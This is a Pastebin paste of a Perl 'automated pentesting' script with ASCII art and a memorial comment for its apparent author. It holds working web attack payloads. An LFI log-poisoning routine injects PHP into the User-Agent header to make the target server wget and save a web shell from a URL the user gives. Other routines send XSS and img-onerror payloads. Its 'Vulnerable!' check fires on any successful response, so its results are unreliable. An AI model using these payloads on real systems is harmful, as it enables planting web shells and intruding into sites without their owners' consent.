Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl -w
- use strict;
- use warnings;
- use LWP::UserAgent;
- use HTTP::Request;
- use Term::ANSIColor;
- use LWP::Protocol::https;
- #Automated Pentesting Tool.
- #please Dont Take My Code without Giving me some kind of Credit. Thank You !. Love you guys !
- #Twitter: @SonnySpooks
- #Skype: S.0.n.n.y_
- # we loved you Sonny, we wished you didn't have to do what you did
- # you was such a good researcher, you had such good intentions.
- # you was flawless & intelligent. you was really smart.
- # you've breached/leaked plently of large companies.
- # you managed to do alot in the years you was here.
- # I'm sorry that i now have to say RIP before you name
- # rest in peace my dude. I'm still wishing i could have
- # just one more conversation with you man. Goodbye man. -Chris Poole \ @codingplanets
- # We in the scene love you man. -Everyone
- print ("bold red");
- print <<EOTEXT;
- , ,
- S, S, ,
- "ss.Sss. .s'
- , .ssSSSSSSSSSSs,
- S. sSSSSSSSSSSSSSS`SSSs
- "SSSSSSSSSSSSSSSSSSoSSS ,
- sSSSSSSSSSSSSSSSSSSSSSSSSs, ,s
- sSSSSSSSSS"SSSSSS""""SSSSSS"SSSSS,
- sSSSSSSSSSSs""SSSSssssss"SSSSSSSS"
- sSSSSSSSSSS' `"""ss"S"Ss""
- sSSSSSSSSSS, `"""""S .sSSs
- sSSSSSSSSSSSSs,... `sSS' `
- `ssssSSSSSSSSSSSSSSSSSSSS####s. .SS"S. , s-
- `""""SSSSSSSSSSSSSSSSSSSS#####SSSSSS" S.S'
- "SSSSSSSSSSSSSSSSSSSSS####s"" .SSS|
- "SSSSSSSSSSSSSSSSSSSSSSSS##s .SS" S
- SS""SSSSSSSSSSSSSSSSSSSSSSSSSSSSS" `
- SS" "S"SSSSSSSSSSSSSSSSSSSSS""""'
- , ," ' SSSSSSSSSSSSSSSS####s
- S. .sSSSSSSSSSSSSSSSSS####"
- , "Ss. ..ssSSSSSSSSSSSSSSSSSSSS####"
- S .SSSSSSSSSSSSSSSSSSSSSSSSSSSS#####"
- Ss ..sSSSSSSSSSSSSSSSSSSSSSSSSSSSS######""
- "SSsSSSSSSSSSSSSSSSSSSSSSSSSSSSS########"
- , sSSSSSSSSSSSSSSSSSSSSSSSS#########""'
- S sSSSSSSSSSSSSSSSSSSSSS#######""' s' ,
- SS..SSSSSSSSSSSSSSSSSS######"' ....,SS.... ,S
- "SSSSSSSSSSSSSSS######"' , .sSSSSSSSSSSSSSSSSSsSS
- SSSSSSSSSSSS#####" S, .sSSSSSSSSSSSSSSSSSSSSSSSSs.
- ) SSSSSSSSSSS#####' `SSSSSSSSS###########SSSSSSSSSSS.
- (( SSSSSSSSSSS##### SSSSSSSS###" "####SSSSSSSSSS
- ) \ SSSSSSSSSSSS####. SSSSSS###" "###SSSSSSSSS s'
- ( ) SSSSSSSSSSSSS####. SSSSS###" ####SSSSSSSSsSS'
- ) ( ( SS"SSSSSSSSSSS#####.SSSSS###' MPST V 1.0 .###SSSSSSSSSS"
- ( ) ) _,S" SSSSSSSSSSSS######.SS##' .###SSSSSSSSSS
- ) ( ( \. "SSSSSSSSSSSSS#######,,,. ..####SSSSSSSSSSS"
- ( )S ) ) ,SSSSSSSSSSSSSSSSSS####################SSSSSSSSSSS"
- ( (SS ( \ _sS" `"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS,
- ) )SSSs ) ) . . `SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"' `SS
- ( SSSSs/ .S, .S,,sSSSSSS##SSSSSSSSSSSSSSSSSSSSSSSSSS"" '
- \)_SSSSSSSSSSSSSSSSSSSSSSS##" SS `SS. `SS.
- `"SSSSSSSSSSSSSSSSSS#" S `S `S
- `"""""""""""""' ' ' '
- EOTEXT
- print color "reset";
- print color "green";
- my ($links, $message,$Con);
- my $resume = 1;
- while($resume == 1){
- print color "reset";
- print color "yellow";
- print "Command: ";
- chomp($Con = <STDIN>);
- if($Con eq "LFI"){
- print color "reset";
- my ($url, $links, $FileType);
- print color "yellow";
- print "----------------------\n";
- print "LFI Vulnerable Area: ";
- chomp($url = <STDIN>);
- print "Link To Shell : ";
- chomp($links = <STDIN>);
- print "Name Of Shell (Example: shell.php): ";
- chomp($FileType = <STDIN>);
- print "{Vuln:$url Shell:$links}\n";
- print color "reset";
- my $ua = LWP::UserAgent->new;
- $ua->agent("<?system('wget $links -O $FileType');?>");
- my $req = HTTP::Request->new(POST => "$url");
- $req->content_type('application/x-www-form-urlencoded');
- $req->content('query=libwww-perl&mode=dist');
- my $res = $ua->request($req);
- if ($res->is_success) {
- print color "green";
- print "Vulnerable !\n";
- print color "reset";
- sleep 2;
- }
- else {
- print color "reset";
- print color "red";
- print "Failed\n";
- print "Check The Links\n";
- print color "reset";
- }
- }
- if($Con eq "clear"){
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- }
- if($Con eq "help"){
- print "LFI - Local File Inclusion\n";
- print "CSRF - Cross-Site Request Forgery\n";
- print "XSS - Cross-Site Scripting\n";
- print "clear - Clears Terminal\n";
- }
- if($Con eq "XSS"){
- my ($XSSLink, $XSSMessage);
- print color "reset";
- print color "yellow";
- print "----------------------\n";
- print "XSS Area ~: ";
- chomp($XSSLink = <STDIN>);
- print "Alert Message ~: ";
- chomp($XSSMessage = <STDIN>);
- print "Sending ~~~~~~\n";
- my $XSS = ("<script>alert(/$XSSMessage/)</script>");
- my $ua = LWP::UserAgent->new;
- $ua->agent("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1");
- my $req = HTTP::Request->new(GET => "$XSSLink$XSS");
- $req->content_type('application/x-www-form-urlencoded');
- $req->content('query=libwww-perl&mode=dist');
- my $res = $ua->request($req);
- if ($res->is_success) {
- print color "green";
- print "Vulnerable ! \n";
- print color "reset";
- sleep 2;
- }
- else {
- print "Error: " . $res->status_line . "\n";
- print color "reset";
- print color "red";
- print "Failed\n";
- print "Check The Links\n";
- print color "reset";
- }
- }
- if($Con eq "CSRF"){
- print color "reset";
- print color "yellow";
- print "----------------------\n";
- print "Vulnerable Area ~: ";
- chomp($links = <STDIN>);
- print "Alert Message ~: ";
- chomp($message = <STDIN>);
- print "Starting The Request...\n";
- my $CS = '<img src="http://xxx.xxx.xxx.xxx.frenchskids.edu" onerror=window.open("http://www.twitter.com/SonnySpooks","SONNYSPOOKS","height=1337,width=1337");>';
- my $ua = LWP::UserAgent->new;
- $ua->agent("$CS");
- my $req = HTTP::Request->new(POST => "$links");
- $req->content_type('application/x-www-form-urlencoded');
- $req->content('query=libwww-perl&mode=dist');
- my $res = $ua->request($req);
- if ($res->is_success) {
- print color "green";
- print "Vulnerable ! \n";
- print color "reset";
- sleep 2;
- }
- else {
- print color "reset";
- print color "red";
- print "Failed\n";
- print "Check The Links\n";
- print color "reset";
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement